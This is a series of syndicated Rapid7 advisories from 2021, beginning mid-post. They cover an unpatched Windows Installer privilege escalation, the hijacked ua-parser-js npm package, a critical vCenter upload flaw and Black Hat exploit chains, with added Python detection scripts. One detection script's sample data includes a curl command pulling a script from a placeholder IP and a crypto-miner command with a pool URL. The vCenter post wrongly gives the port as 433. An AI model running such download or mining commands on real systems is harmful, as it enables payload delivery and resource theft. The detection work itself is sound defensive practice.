Fast-forward to November 22, 2021, when after investigating the patch, the researcher that discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on GitHub proving exploitation of the vulnerability is still possible on patched versions of Windows allowing for SYSTEM-level privileges. The working PoC “overwrites Microsoft Edge elevation service ‘DACL’ and copies itself to the service location, then executes it to gain elevated privileges.”

With a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in malware.

As of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as CVE-2021-36934 (“HiveNightmare”/”SeriousSAM”), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won’t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021’s Patch Tuesday.

Affected versions

According to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.

Guidance

With no official patch at this time, we recommend that organizations prepare to patch as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that a number of antimalware programs have added detection for this exploit, so, as usual, keep those programs up to date. Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 together with the product name “test pkg” (keeping in mind that “test pkg” will only match this exact PoC, which more enterprising attackers may modify).
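As an added example (not part of the original post), here is a small Python script that applies the detection just described to exported Application log records: it keeps only MsiInstaller Event ID 1033 entries, pulls the product name out of the rendered message, and flags names on a watchlist seeded with “test pkg”. The event records, the message layout the regular expression assumes, and the function names are all constructed for this example.

```python
import re
from typing import Iterable, List, Optional

# The public PoC installs a package named "test pkg"; that product name is the
# indicator the post cites. Extend this set when hunting for renamed variants.
SUSPICIOUS_PRODUCT_NAMES = {"test pkg"}

# Assumed layout of the rendered MsiInstaller 1033 message. The field labels
# follow what Windows writes; the exact wording here is a constructed approximation.
PRODUCT_NAME_RE = re.compile(r"Product Name:\s*(.+?)\.\s+Product Version:")

# Constructed records shaped like an exported Application log (event id,
# provider, rendered message). The first entry mimics the PoC install; the
# third has the indicator string but is not a 1033 event and must not match.
SAMPLE_EVENTS = [
    {"EventID": 1033, "Provider": "MsiInstaller",
     "Message": "Windows Installer installed the product. Product Name: test pkg. "
                "Product Version: 1.0.0. Product Language: 1033. Manufacturer: test. "
                "Installation success or error status: 1603."},
    {"EventID": 1033, "Provider": "MsiInstaller",
     "Message": "Windows Installer installed the product. Product Name: Sample Tool 19.00 (x64 edition). "
                "Product Version: 19.00.00.0. Product Language: 1033. Manufacturer: Example Corp. "
                "Installation success or error status: 0."},
    {"EventID": 11707, "Provider": "MsiInstaller",
     "Message": "Product: test pkg -- Installation completed successfully."},
    {"EventID": 1033, "Provider": "MsiInstaller",
     "Message": "Windows Installer installed the product. Product Name: Updater. "
                "Product Version: 2.0. Product Language: 1033. Manufacturer: . "
                "Installation success or error status: 0."},
]


def product_name(message: str) -> Optional[str]:
    """Pull the Product Name field out of a rendered 1033 message, if present."""
    match = PRODUCT_NAME_RE.search(message)
    return match.group(1).strip() if match else None


def find_poc_installs(events: Iterable[dict], names=SUSPICIOUS_PRODUCT_NAMES) -> List[dict]:
    """Return the MsiInstaller 1033 events whose product name is on the watchlist."""
    wanted = {n.lower() for n in names}
    hits = []
    for event in events:
        if event.get("EventID") != 1033 or event.get("Provider") != "MsiInstaller":
            continue
        name = product_name(event.get("Message", ""))
        if name and name.lower() in wanted:
            hits.append({"product": name, "message": event["Message"]})
    return hits


if __name__ == "__main__":
    for hit in find_poc_installs(SAMPLE_EVENTS):
        print(f"possible CVE-2021-41379 PoC install: {hit['product']}")
```

The product-name match is exact by design; widening the watchlist (or matching on other fields of the 1033 event) is how you would extend this beyond the unmodified PoC.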

Rapid7 customers

For Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.

In the meantime, InsightVM customers can use Query Builder to find Windows assets by creating the following query: os.family contains windows. Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for OS contains windows.

NPM Library (ua-parser-js) Hijacked: What You Need to Know

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/10/25/npm-library-ua-parser-js-hijacked-what-you-need-to-know/

For approximately 4 hours on Friday, October 22, 2021, a widely utilized NPM package, ua-parser-js, was embedded with a malicious script intended to install a coinminer and harvest user/credential information. This package is used “to detect Browser, Engine, OS, CPU, and Device type/model from User-Agent data,” with nearly 8 million weekly downloads and 1,200 dependencies.

The malicious package was available for download starting on October 22, 2021, at 12:15 PM GMT, and ending October 22, 2021, between 4:16 PM and 4:26 PM GMT. During that time, 3 versions of the package were compromised with a script that would execute on Windows and Linux machines:

Affected Version    Patched Version
0.7.29              0.7.30
0.8.0               0.8.1
1.0.0               1.0.1

Both GitHub and CISA issued advisories urging users to upgrade right away and review systems for suspicious or malicious activity.

Due to the quick reporting of issues by GitHub users and action by the developer, development exposure will be limited to teams who had a pull/build during that (roughly) 4-hour timeframe.

At this time, the source of the attack is unconfirmed. However, with the use of IntSights, recently acquired by Rapid7, a suspicious thread has been identified, created on October 5, 2021, in a prominent Russian hacking forum. There, a threat actor offered access to a developer account of an undisclosed package on npmjs.com, indicating that the package has “more than 7 million installations every week, more than 1,000 others are dependent on this.” With a requested price of $20,000, the threat actor stated that the account does not have 2-factor authentication.

While there is no definitive evidence that the compromise of ua-parser-js is related to the above-mentioned dark-web activity, the weekly installs and dependency numbers appear to match and align with the developers’ post of an account hijack.

Rapid7 guidance

Rapid7 recommends development teams immediately heed the advice for organizations to review for the use of these versions and remediate accordingly. Additionally, organizations’ security teams need to be on the lookout for users who visited a site infected with the malicious script. Several anti-malware programs have (or have since added) detections for this, and organizations should keep an eye open for network traffic that is hitting domains/IPs associated with coin mining.
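To make the version review concrete, here is an added Python example (not the post’s or the project’s own code) that checks an npm lockfile for installed copies of ua-parser-js at the compromised versions from the table above and reports the patched release for each. It handles both the lockfileVersion 2/3 “packages” map and the nested lockfileVersion 1 “dependencies” tree, and catches copies nested under other packages. The two lockfiles are constructed inline for the example.

```python
import json
from typing import Dict, List, Tuple

# Versions that carried the malicious script, mapped to the clean release that
# replaced each one (the post's table).
COMPROMISED_VERSIONS: Dict[str, str] = {
    "0.7.29": "0.7.30",
    "0.8.0": "0.8.1",
    "1.0.0": "1.0.1",
}
PACKAGE = "ua-parser-js"

# Constructed lockfiles. lockfileVersion 2/3 lists every installed copy under
# "packages"; lockfileVersion 1 nests copies under "dependencies".
SAMPLE_LOCK_V2 = json.dumps({
    "name": "example-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"dependencies": {"ua-parser-js": "^0.7.0"}},
        "node_modules/ua-parser-js": {"version": "0.7.29"},
        "node_modules/express": {"version": "4.17.1"},
        "node_modules/some-lib/node_modules/ua-parser-js": {"version": "1.0.0"},
        "node_modules/other-lib/node_modules/ua-parser-js": {"version": "0.7.28"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app",
    "lockfileVersion": 1,
    "dependencies": {
        "ua-parser-js": {"version": "0.8.0"},
        "some-lib": {
            "version": "3.1.0",
            "dependencies": {"ua-parser-js": {"version": "0.8.1"}},
        },
    },
})


def _walk_v1(deps: dict, prefix: str, package: str, out: List[Tuple[str, str]]) -> None:
    """Recurse through a lockfileVersion 1 dependency tree, collecting copies of `package`."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        if name == package and "version" in meta:
            out.append((path, meta["version"]))
        _walk_v1(meta.get("dependencies", {}), path + "/", package, out)


def installed_copies(lock: dict, package: str) -> List[Tuple[str, str]]:
    """Return (install path, version) for every copy of `package`, nested ones included."""
    copies: List[Tuple[str, str]] = []
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            # The package name is whatever follows the last "node_modules/".
            if path.split("node_modules/")[-1] == package and "version" in meta:
                copies.append((path, meta["version"]))
    else:
        _walk_v1(lock.get("dependencies", {}), "", package, copies)
    return copies


def find_compromised(lock_text: str) -> List[dict]:
    """List every installed ua-parser-js copy at a compromised version, with the fix."""
    lock = json.loads(lock_text)
    return [
        {"path": path, "version": version, "upgrade_to": COMPROMISED_VERSIONS[version]}
        for path, version in installed_copies(lock, PACKAGE)
        if version in COMPROMISED_VERSIONS
    ]


if __name__ == "__main__":
    for lock in (SAMPLE_LOCK_V2, SAMPLE_LOCK_V1):
        for hit in find_compromised(lock):
            print(f"{hit['path']}: {hit['version']} -> upgrade to {hit['upgrade_to']}")
```

Run it against `package-lock.json` from each repository and build image; the lockfile is what records which copy actually got installed during the exposure window, which the manifest’s version range does not tell you.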

Rapid7 customers

InsightVM

InsightVM users will be able to assess their exposure to malicious versions of the ua-parser-js package via Container Security functionality in an upcoming release. No Scan Engine or Insight Agent-based checks are currently planned.

InsightIDR

InsightIDR customers, including Managed Detection & Response customers, were already equipped with detections that may be indicative of related malicious activity:

  • Cryptocurrency Miner – XMRig
  • Suspicious Process – Curl to External IP Address
  • Wget to External IP Address

Additionally, Rapid7 has updated the following rule to provide additional coverage:

  • Cryptocurrency Miner – Mining Pool URL in Command Line
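The rules listed above are named by what they match on; as an added illustration (not InsightIDR’s own rule logic, which is not published here), the following Python applies the same three ideas to constructed process-start records: a curl or wget command line that fetches from a literal IP address outside the organization’s internal ranges, an image named xmrig, and a mining-pool URL (stratum+tcp:// or stratum+ssl://) anywhere in the command line. The internal ranges, sample records and rule strings are assumptions for the example.

```python
import ipaddress
import re
from typing import List

# Internal ranges: anything outside these counts as "external". Adjust to the
# address plan of the environment being monitored (assumed RFC 1918 plus loopback).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
POOL_URL_RE = re.compile(r"stratum\+(?:tcp|ssl)://", re.IGNORECASE)
DOWNLOADERS = {"curl", "wget"}
MINERS = {"xmrig"}

# Constructed process-start records (image path and command line), shaped like
# an EDR or Sysmon Event ID 1 export. Addresses and hostnames are placeholders.
SAMPLE_PROCESSES = [
    {"image": "/usr/bin/curl", "cmdline": "curl -s http://203.0.113.10/setup.sh -o /tmp/s.sh"},
    {"image": "/usr/bin/wget", "cmdline": "wget http://10.0.0.5/artifacts/app.tar.gz"},
    {"image": "/tmp/.cache/miner", "cmdline": "/tmp/.cache/miner -o stratum+tcp://pool.invalid:3333 -u w"},
    {"image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl https://registry.npmjs.org/ua-parser-js"},
    {"image": "/usr/local/bin/xmrig", "cmdline": "xmrig --donate-level 1"},
]


def program_name(image: str) -> str:
    """Basename of the image path, lower-cased, without a .exe suffix."""
    name = re.split(r"[\\/]", image)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def is_external(ip_text: str) -> bool:
    """True when the literal address falls outside every internal range."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def classify(proc: dict) -> List[str]:
    """Return the detection names that fire for one process record."""
    alerts: List[str] = []
    name = program_name(proc["image"])
    cmdline = proc["cmdline"]
    if name in DOWNLOADERS and any(is_external(ip) for ip in IP_URL_RE.findall(cmdline)):
        alerts.append(f"Suspicious Process - {name.capitalize()} to External IP Address")
    if name in MINERS:
        alerts.append("Cryptocurrency Miner - XMRig")
    if POOL_URL_RE.search(cmdline):
        alerts.append("Cryptocurrency Miner - Mining Pool URL in Command Line")
    return alerts


def scan(procs) -> List[dict]:
    """Keep only the records that raised at least one alert."""
    results = []
    for proc in procs:
        alerts = classify(proc)
        if alerts:
            results.append({"cmdline": proc["cmdline"], "alerts": alerts})
    return results


if __name__ == "__main__":
    for result in scan(SAMPLE_PROCESSES):
        print(result["cmdline"], "->", "; ".join(result["alerts"]))
```

Note that the second sample (wget to 10.0.0.5) is deliberately silent because the address is internal, and the fourth (curl to a hostname) is silent because the rule, like the one it illustrates, keys on a literal IP; a pool rule catches the miner in the third record even though the binary is not named xmrig.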

Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/

On Tuesday, September 21, 2021, VMware published security advisory VMSA-2021-0020, which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 433 “regardless of the configuration settings of vCenter Server.”

VMware has published an FAQ outlining the details of this vulnerability and makes it clear that this should be patched “immediately.” A workaround is also being provided by VMware — however, its use is not being recommended and should only be used as a temporary solution.

Affected products

  • vCenter Server versions 6.7 and 7.0
  • Cloud Foundation (vCenter Server) 3.x, 4.x

Guidance

We echo VMware’s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days — just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.

We will update this post as more information becomes available, such as information on exploitation.

Rapid7 customers

A vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.

In the meantime, InsightVM customers can use Query Builder to find assets that have vCenter Server installed by creating the following query: software.description contains vCenter Server. Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for Software name contains vCenter Server.

Popular Attack Surfaces, August 2021: What You Need to Know

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/

Whether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks’ brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The “hacker summer camp” conferences frequently also highlight attack surface area that may not be net-new — but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7’s summaries here and here.

Here’s the specific attack surface area and a few of the exploit chains we’re keeping our eye on right now:

  • Orange Tsai stole the show (as always) at Black Hat with a talk on fresh Microsoft Exchange attack surface area. All in all, Orange discussed CVEs from what appears to be four separate attack chains — including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack back in March and the “ProxyShell” exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.
  • Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both new Windows Print Spooler vulnerabilities and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the “PrintNightmare” vulnerability from several weeks ago, it’s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.
  • There’s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention — the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn’t completely fade away — despite the fact that it’s authenticated and requires admin access. With CISA’s warnings about APT attacks against Pulse Connect Secure devices, it’s probably wise to patch CVE-2021-22937 quickly.
  • And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that abuse Active Directory Certificate Services — something we covered previously in our summary of the PetitPotam attack chain. This is neat research for red teams, and it may well show up on blue teams’ pentest reports.

Microsoft Exchange ProxyShell chain

Patches: Available
Threat status: Possible threat (at least one report of exploitation in the wild)

It goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed “ProxyShell,” allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., CVE-2021-26855 and CVE-2021-27065), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.

Two of the three vulnerabilities used for ProxyShell were patched by Microsoft in April and the third in July. As of August 9, 2021, private exploits have already been developed, and it’s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that close to 75,000 ProxyShell-vulnerable Exchange servers are online, and that figure is a lower bound.

We strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven’t patched yet, you should do so immediately on an emergency basis.

One gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the most recent Cumulative Update versions, so it’s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.

ProxyShell CVEs:

Windows Print Spooler — and more printer woes

Patches: Varies by CVE, mostly available
Threat status: Varies by CVE, active and impending

The Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher Jacob Baines. Of this last group, one vulnerability — CVE-2021-38085 — remains unpatched.

On August 11, 2021, Microsoft assigned CVE-2021-36958 to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7’s blog on PrintNightmare for further details and updates.

Windows Print Spooler and related CVEs:

  • CVE-2020-1048 (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)
  • CVE-2020-1337 (patch bypass for CVE-2020-1048; Metasploit module available)
  • CVE-2020-17001 (patch bypass variant for CVE-2020-1048)
  • CVE-2020-17014 (patch bypass variant for CVE-2020-1048)
  • CVE-2020-1300 (local privilege escalation technique known as “EvilPrinter” presented at DEF CON 2020)
  • CVE-2021-24088 (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)
  • CVE-2021-24077 (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)
  • CVE-2021-1722 (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)
  • CVE-2021-1675 (elevation of privilege vuln in Windows Print Spooler patched in June 2021)
  • CVE-2021-34527, aka “PrintNightmare”
  • CVE-2021-35449 (print driver local privilege escalation vulnerability, as presented at DEF CON 2021; Metasploit module in progress)
  • CVE-2021-38085 (unpatched print driver local privilege escalation vulnerability, as presented at DEF CON 2021; Metasploit module in progress)
  • CVE-2021-36958 (unpatched remote code execution vulnerability; announced August 11, 2021)

Currently, both PrintNightmare CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.

Pulse Connect Secure CVE-2021-22937

Patch: Available
Threat status: Impending (Exploitation expected soon)

On Monday, August 2, 2021, Ivanti published Security Advisory SA44858 which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user root.

Public proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is a patch bypass for CVE-2020-8260, an authentication bypass vulnerability released in October 2020 that was heavily utilized by attackers.

The Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the Exploitation of Pulse Connect Secure Vulnerabilities demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year’s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.

PetitPotam: Windows domain compromise

Patches: Available
Threat status: Threat (Exploited in the wild)

In July 2021, security researcher Topotam published a PoC implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our senior researchers summed it up with: "This attack is too easy." You can read Rapid7’s full blog post here.

On August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector as part of that day’s Patch Tuesday. Tracked as CVE-2021-36942, the August 2021 Patch Tuesday security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take the additional steps listed in KB5005413 to ensure their systems are fully mitigated.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven’t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, those two are still awaiting analysis and check development.
